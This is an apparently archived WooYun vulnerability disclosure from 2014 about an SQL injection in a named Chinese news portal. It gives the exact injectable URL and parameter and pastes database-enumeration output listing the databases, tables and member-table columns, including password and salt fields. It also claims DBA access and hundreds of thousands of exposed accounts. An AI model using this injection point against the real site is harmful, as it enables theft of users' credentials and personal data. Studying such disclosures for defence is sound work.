当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080464

漏洞标题:某大型新闻门户高危SQL注射(全库泄露,数据告急)

相关厂商:某大型新闻门

漏洞作者: 路人甲

提交时间:2014-10-23 14:19

修复时间:2014-12-07 14:20

公开时间:2014-12-07 14:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某大型新闻门户高危SQL注射 # 全库泄露,数据告急

详细说明:

某大型新闻门户高危SQL注射 # 全库泄露,数据告急

漏洞证明:

黄海在线,滨海第一新媒体门户
1、ucenter表35万用户账号密码邮箱等泄露
2、phpcms表12万用户账号密码等资料泄露
3、phpwind表5000多用户账号密码泄露
4、dba权限
注射地址:

http://www.zghhzx.com.cn/index.php?m=content&c=index&a=show&catid=125&id=5


available databases [7]:
[*] bh_phpcms
[*] bh_phpwind
[*] bh_ucenter
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
Database: bh_phpcms
[172 tables]
+---------------------------+
| pw_activitymembers        |
| v9_admin                  |
| v9_admin_panel            |
| v9_admin_role             |
| v9_admin_role_priv        |
| v9_announce               |
| v9_ask                    |
| v9_ask_data               |
| v9_attachment             |
| v9_attachment_index       |
| v9_badword                |
| v9_block                  |
| v9_block_history          |
| v9_block_priv             |
| v9_cache                  |
| v9_category               |
| v9_category_priv          |
| v9_collection_content     |
| v9_collection_history     |
| v9_collection_node        |
| v9_collection_program     |
| v9_comment                |
| v9_comment_check          |
| v9_comment_data_1         |
| v9_comment_setting        |
| v9_comment_table          |
| v9_content_check          |
| v9_copyfrom               |
| v9_datacall               |
| v9_dbsource               |
| v9_download               |
| v9_download_data          |
| v9_downservers            |
| v9_extend_setting         |
| v9_fangyuan               |
| v9_fangyuan_data          |
| v9_favorite               |
| v9_flash                  |
| v9_flash_data             |
| v9_form_dingfang          |
| v9_form_kanfang           |
| v9_fuwu                   |
| v9_fuwu_data              |
| v9_gongqiu                |
| v9_gongqiu_data           |
| v9_hits                   |
| v9_house                  |
| v9_house_data             |
| v9_house_new              |
| v9_house_new_data         |
| v9_housesales             |
| v9_housesales_data        |
| v9_ipbanned               |
| v9_jiaoyou                |
| v9_jiaoyou_data           |
| v9_keylink                |
| v9_lanmu                  |
| v9_lanmu_data             |
| v9_link                   |
| v9_linkage                |
| v9_live                   |
| v9_live_data              |
| v9_log                    |
| v9_loupan                 |
| v9_loupan_data            |
| v9_lpstatus               |
| v9_lpstatus_data          |
| v9_lpxc                   |
| v9_lpxc_data              |
| v9_member                 |
| v9_member_detail          |
| v9_member_group           |
| v9_member_menu            |
| v9_member_verify          |
| v9_member_vip             |
| v9_menu                   |
| v9_message                |
| v9_message_data           |
| v9_message_group          |
| v9_mobile                 |
| v9_mobile_type            |
| v9_model                  |
| v9_model_field            |
| v9_module                 |
| v9_mood                   |
| v9_movie                  |
| v9_movie_data             |
| v9_mrotation              |
| v9_mrotation_data         |
| v9_news                   |
| v9_news_data              |
| v9_page                   |
| v9_pay_account            |
| v9_pay_payment            |
| v9_pay_spend              |
| v9_picture                |
| v9_picture_data           |
| v9_player                 |
| v9_plugin                 |
| v9_plugin_var             |
| v9_position               |
| v9_position_data          |
| v9_poster                 |
| v9_poster_201209          |
| v9_poster_201210          |
| v9_poster_201211          |
| v9_poster_201212          |
| v9_poster_201301          |
| v9_poster_201302          |
| v9_poster_201303          |
| v9_poster_201304          |
| v9_poster_201305          |
| v9_poster_201306          |
| v9_poster_201307          |
| v9_poster_201308          |
| v9_poster_201309          |
| v9_poster_201310          |
| v9_poster_201311          |
| v9_poster_201312          |
| v9_poster_201401          |
| v9_poster_201402          |
| v9_poster_201403          |
| v9_poster_201404          |
| v9_poster_201405          |
| v9_poster_201406          |
| v9_poster_201407          |
| v9_poster_201408          |
| v9_poster_201409          |
| v9_poster_201410          |
| v9_poster_space           |
| v9_qiuzhi                 |
| v9_qiuzhi_data            |
| v9_queue                  |
| v9_release_point          |
| v9_replay                 |
| v9_replay_data            |
| v9_search                 |
| v9_search_keyword         |
| v9_session                |
| v9_site                   |
| v9_sms_report             |
| v9_special                |
| v9_special_c_data         |
| v9_special_content        |
| v9_sphinx_counter         |
| v9_sso_admin              |
| v9_sso_applications       |
| v9_sso_members            |
| v9_sso_messagequeue       |
| v9_sso_session            |
| v9_sso_settings           |
| v9_tag                    |
| v9_template_bak           |
| v9_times                  |
| v9_trend                  |
| v9_trend_data             |
| v9_type                   |
| v9_urlrule                |
| v9_video                  |
| v9_video_data             |
| v9_videoconversionresults |
| v9_videoconversiontasks   |
| v9_vote_data              |
| v9_vote_option            |
| v9_vote_subject           |
| v9_wap                    |
| v9_wap_type               |
| v9_workflow               |
| v9_zhaopin                |
| v9_zhaopin_data           |
| v9_zhuchiren              |
| v9_zhuchiren_data         |
+---------------------------+
Database: bh_phpcms
Table: v9_member
[24 columns]
+-------------+-----------------------+
| Column      | Type                  |
+-------------+-----------------------+
| from        | char(10)              |
| amount      | decimal(8,2) unsigned |
| areaid      | smallint(5) unsigned  |
| connectid   | char(15)              |
| email       | char(32)              |
| encrypt     | char(6)               |
| groupid     | tinyint(3) unsigned   |
| islock      | tinyint(1) unsigned   |
| lastdate    | int(10) unsigned      |
| lastip      | char(15)              |
| loginnum    | smallint(5) unsigned  |
| message     | tinyint(1) unsigned   |
| modelid     | smallint(5) unsigned  |
| nickname    | char(20)              |
| overduedate | int(10) unsigned      |
| password    | char(32)              |
| phpssouid   | mediumint(8) unsigned |
| point       | smallint(5) unsigned  |
| regdate     | int(10) unsigned      |
| regip       | char(15)              |
| siteid      | smallint(5) unsigned  |
| userid      | mediumint(8) unsigned |
| username    | char(30)              |
| vip         | tinyint(1) unsigned   |
+-------------+-----------------------+


Database: bh_ucenter
[19 tables]
+---------------------+
| uc_admins           |
| uc_applications     |
| uc_badwords         |
| uc_domains          |
| uc_failedlogins     |
| uc_feeds            |
| uc_friends          |
| uc_mailqueue        |
| uc_memberfields     |
| uc_members          |
| uc_mergemembers     |
| uc_newpm            |
| uc_notelist         |
| uc_pms              |
| uc_protectedmembers |
| uc_settings         |
| uc_sqlcache         |
| uc_tags             |
| uc_vars             |
+---------------------+
Database: bh_ucenter
Table: uc_members
[12 columns]
+---------------+-----------------------+
| Column        | Type                  |
+---------------+-----------------------+
| email         | char(32)              |
| lastloginip   | int(10)               |
| lastlogintime | int(10) unsigned      |
| myid          | char(30)              |
| myidkey       | char(16)              |
| password      | char(32)              |
| regdate       | int(10) unsigned      |
| regip         | char(15)              |
| salt          | char(6)               |
| secques       | char(8)               |
| uid           | mediumint(8) unsigned |
| username      | char(30)              |
+---------------+-----------------------+


Database: bh_phpwind
[279 tables]
+------------------------------+
| pw_actattachs                |
| pw_actions                   |
| pw_active                    |
| pw_activity                  |
| pw_activitycate              |
| pw_activitydefaultvalue      |
| pw_activityfield             |
| pw_activitymembers           |
| pw_activitymodel             |
| pw_activitypaylog            |
| pw_activityvalue1            |
| pw_activityvalue10           |
| pw_activityvalue11           |
| pw_activityvalue12           |
| pw_activityvalue13           |
| pw_activityvalue14           |
| pw_activityvalue15           |
| pw_activityvalue16           |
| pw_activityvalue17           |
| pw_activityvalue2            |
| pw_activityvalue3            |
| pw_activityvalue4            |
| pw_activityvalue5            |
| pw_activityvalue6            |
| pw_activityvalue7            |
| pw_activityvalue8            |
| pw_activityvalue9            |
| pw_actmember                 |
| pw_actmembers                |
| pw_administrators            |
| pw_adminlog                  |
| pw_adminset                  |
| pw_advert                    |
| pw_announce                  |
| pw_area_level                |
| pw_areas                     |
| pw_argument                  |
| pw_attachbuy                 |
| pw_attachdownload            |
| pw_attachs                   |
| pw_attention                 |
| pw_attention_blacklist       |
| pw_auth_certificate          |
| pw_ban                       |
| pw_banuser                   |
| pw_bbsinfo                   |
| pw_buyadvert                 |
| pw_cache                     |
| pw_cache_distribute          |
| pw_cache_members             |
| pw_cachedata                 |
| pw_channel                   |
| pw_clientorder               |
| pw_cmembers                  |
| pw_cms_article               |
| pw_cms_articlecontent        |
| pw_cms_articleextend         |
| pw_cms_attach                |
| pw_cms_column                |
| pw_cms_comment               |
| pw_cms_commentreply          |
| pw_cms_purview               |
| pw_cnalbum                   |
| pw_cnclass                   |
| pw_cnlevel                   |
| pw_cnphoto                   |
| pw_cnskin                    |
| pw_cnstyles                  |
| pw_collection                |
| pw_collectiontype            |
| pw_colonys                   |
| pw_comment                   |
| pw_company                   |
| pw_config                    |
| pw_creditlog                 |
| pw_credits                   |
| pw_customfield               |
| pw_cwritedata                |
| pw_datanalyse                |
| pw_datastate                 |
| pw_datastore                 |
| pw_debatedata                |
| pw_debates                   |
| pw_delta_diarys              |
| pw_delta_members             |
| pw_delta_posts               |
| pw_delta_threads             |
| pw_diary                     |
| pw_diarytype                 |
| pw_dida_comment              |
| pw_dida_data                 |
| pw_dida_relate               |
| pw_dida_user                 |
| pw_draft                     |
| pw_elements                  |
| pw_extragroups               |
| pw_favors                    |
| pw_feed                      |
| pw_filter                    |
| pw_filter_class              |
| pw_filter_dictionary         |
| pw_focus                     |
| pw_forumdata                 |
| pw_forumlog                  |
| pw_forummsg                  |
| pw_forums                    |
| pw_forumsell                 |
| pw_forumsextra               |
| pw_friends                   |
| pw_friendtype                |
| pw_group_replay              |
| pw_hack                      |
| pw_help                      |
| pw_hits_threads              |
| pw_invitecode                |
| pw_inviterecord              |
| pw_invoke                    |
| pw_invokepiece               |
| pw_ipstates                  |
| pw_job                       |
| pw_jober                     |
| pw_kmd_info                  |
| pw_kmd_paylog                |
| pw_kmd_spread                |
| pw_kmd_user                  |
| pw_log_aggregate             |
| pw_log_attachs               |
| pw_log_colonys               |
| pw_log_diary                 |
| pw_log_forums                |
| pw_log_members               |
| pw_log_postdefend            |
| pw_log_posts                 |
| pw_log_postverify            |
| pw_log_setting               |
| pw_log_threads               |
| pw_log_userdefend            |
| pw_log_weibos                |
| pw_medal_apply               |
| pw_medal_award               |
| pw_medal_info                |
| pw_medal_log                 |
| pw_member_behavior_statistic |
| pw_membercredit              |
| pw_memberdata                |
| pw_memberinfo                |
| pw_members                   |
| pw_membertags                |
| pw_membertags_relations      |
| pw_memo                      |
| pw_modehot                   |
| pw_mpageconfig               |
| pw_ms_attachs                |
| pw_ms_configs                |
| pw_ms_messages               |
| pw_ms_relations              |
| pw_ms_replies                |
| pw_ms_searchs                |
| pw_ms_tasks                  |
| pw_nav                       |
| pw_oboard                    |
| pw_online                    |
| pw_online_guest              |
| pw_online_statistics         |
| pw_online_user               |
| pw_ouserdata                 |
| pw_overprint                 |
| pw_owritedata                |
| pw_pagecache                 |
| pw_pageinvoke                |
| pw_pcfield                   |
| pw_pcmember                  |
| pw_pcvalue1                  |
| pw_permission                |
| pw_pidtmp                    |
| pw_pinglog                   |
| pw_plan                      |
| pw_polls                     |
| pw_portalpage                |
| pw_postcate                  |
| pw_posts                     |
| pw_postsfloor                |
| pw_poststopped               |
| pw_privacy                   |
| pw_proclock                  |
| pw_pushdata                  |
| pw_pushpic                   |
| pw_rate                      |
| pw_rateconfig                |
| pw_rateresult                |
| pw_recycle                   |
| pw_replyreward               |
| pw_replyrewardrecord         |
| pw_report                    |
| pw_reward                    |
| pw_robbuild                  |
| pw_robbuildfloor             |
| pw_schcache                  |
| pw_school                    |
| pw_searchadvert              |
| pw_searchforum               |
| pw_searchhotwords            |
| pw_searchstatistic           |
| pw_setform                   |
| pw_sharelinks                |
| pw_sharelinksrelation        |
| pw_sharelinkstype            |
| pw_singleright               |
| pw_smiles                    |
| pw_space                     |
| pw_sqlcv                     |
| pw_statistics_daily          |
| pw_stopic                    |
| pw_stopic_comment            |
| pw_stopic_commentreply       |
| pw_stopicblock               |
| pw_stopiccategory            |
| pw_stopicpictures            |
| pw_stopicunit                |
| pw_styles                    |
| pw_tagdata                   |
| pw_tags                      |
| pw_task                      |
| pw_temp_keywords             |
| pw_threads                   |
| pw_threads_at                |
| pw_threads_img               |
| pw_tmsgs                     |
| pw_toollog                   |
| pw_tools                     |
| pw_topiccate                 |
| pw_topicfield                |
| pw_topicmodel                |
| pw_topictype                 |
| pw_topicvalue1               |
| pw_topicvalue2               |
| pw_topicvalue3               |
| pw_topicvalue4               |
| pw_topicvalue5               |
| pw_topicvalue6               |
| pw_topicvalue7               |
| pw_topicvalue8               |
| pw_tpl                       |
| pw_trade                     |
| pw_tradeorder                |
| pw_ucapp                     |
| pw_ucnotify                  |
| pw_ucsyncredit               |
| pw_user_career               |
| pw_user_education            |
| pw_userapp                   |
| pw_userbinding               |
| pw_usercache                 |
| pw_usergroups                |
| pw_usertool                  |
| pw_voter                     |
| pw_wappush                   |
| pw_wappushtype               |
| pw_weibo_bind                |
| pw_weibo_cmrelations         |
| pw_weibo_cnrelations         |
| pw_weibo_comment             |
| pw_weibo_content             |
| pw_weibo_login_session       |
| pw_weibo_login_user          |
| pw_weibo_referto             |
| pw_weibo_relations           |
| pw_weibo_topicattention      |
| pw_weibo_topicrelations      |
| pw_weibo_topics              |
| pw_windcode                  |
| pw_wordfb                    |
| pw_write_smiles              |
| pw_yun_setting               |
| tp_liuyan                    |
| tp_params                    |
| tp_toupiao                   |
| tp_type                      |
| tp_userinfo                  |
+------------------------------+
Database: bh_phpwind
Table: pw_members
[41 columns]
+------------+----------------------+
| Column     | Type                 |
+------------+----------------------+
| aliww      | varchar(30)          |
| apartment  | int(10) unsigned     |
| attach     | varchar(50)          |
| authmobile | char(16)             |
| banpm      | text                 |
| bday       | date                 |
| datefm     | varchar(15)          |
| email      | varchar(60)          |
| gender     | tinyint(1)           |
| groupid    | tinyint(3)           |
| groups     | varchar(255)         |
| hack       | varchar(255)         |
| home       | int(10) unsigned     |
| honor      | varchar(100)         |
| icon       | varchar(255)         |
| icq        | varchar(12)          |
| introduce  | text                 |
| lastaddrst | varchar(255)         |
| location   | varchar(36)          |
| medals     | varchar(255)         |
| memberid   | tinyint(3)           |
| msggroups  | varchar(255)         |
| msn        | varchar(35)          |
| newpm      | smallint(6) unsigned |
| oicq       | varchar(12)          |
| p_num      | tinyint(3) unsigned  |
| password   | varchar(40)          |
| realname   | varchar(16)          |
| regdate    | int(10) unsigned     |
| safecv     | varchar(10)          |
| shortcut   | varchar(255)         |
| signature  | text                 |
| site       | varchar(75)          |
| style      | varchar(12)          |
| t_num      | tinyint(3) unsigned  |
| timedf     | varchar(5)           |
| uid        | int(10) unsigned     |
| username   | varchar(30)          |
| userstatus | int(10) unsigned     |
| yahoo      | varchar(35)          |
| yz         | int(10)              |
+------------+----------------------+

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝